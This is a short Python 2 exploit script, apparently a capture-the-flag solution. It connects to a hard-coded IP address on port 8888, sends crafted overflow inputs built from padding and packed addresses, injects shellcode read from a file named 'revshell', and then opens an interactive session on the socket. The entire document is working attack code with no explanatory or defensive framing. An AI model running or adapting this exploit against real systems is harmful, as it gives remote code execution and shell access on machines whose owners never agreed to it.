import os
import random
import sys
import struct
import socket
import telnetlib
import time

host = "23.23.190.205"
port = 8888

##########################################################################
# Exploit start
##########################################################################

# Connect to remote host
s = socket.socket()
s.connect((host, port))

f = open("revshell", "rb")
shellcode = f.read()
f.close()

raw_input("Ready? ")

overflow_size = 0x4141

s.send("A" * 0x28 + struct.pack('I', 100) + "\n")
s.send(("A" * 0x28 + struct.pack('I', 200)).ljust(0x50, "B") + struct.pack('I', overflow_size) + "\n")
s.send(struct.pack('I', 0x80484C3) * ((overflow_size - 2) / 4) + "\n")
s.send("A" * 0x28 + struct.pack('I', 300) + "\n")
s.send("\xeb\x2a" + "A" * 0x26 + struct.pack('I', 50) + shellcode + "\n")

# Give control to user
t = telnetlib.Telnet()
t.sock = s
t.interact()